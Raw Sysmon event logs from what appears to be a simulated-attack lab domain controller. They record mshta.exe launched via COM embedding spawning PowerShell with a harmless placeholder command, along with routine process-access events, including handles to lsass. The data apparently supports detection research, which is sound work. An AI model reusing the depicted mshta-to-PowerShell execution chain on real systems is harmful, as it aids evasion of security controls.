15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000025851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.975{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lrvrvvet.jni.ps12021-01-20 15:59:32.975 10341000x800000000000000025850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.960{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.913{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.913{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.913{7901BC46-5364-6008-6106-00000000A301}62203556C:\Windows\system32\conhost.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.913{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.897{7901BC46-5364-6008-5F06-00000000A301}65326384C:\Windows\System32\mshta.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.910{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000025838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.882{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.882{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.866{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.866{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.850{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.850{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.850{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.835{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.838{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe 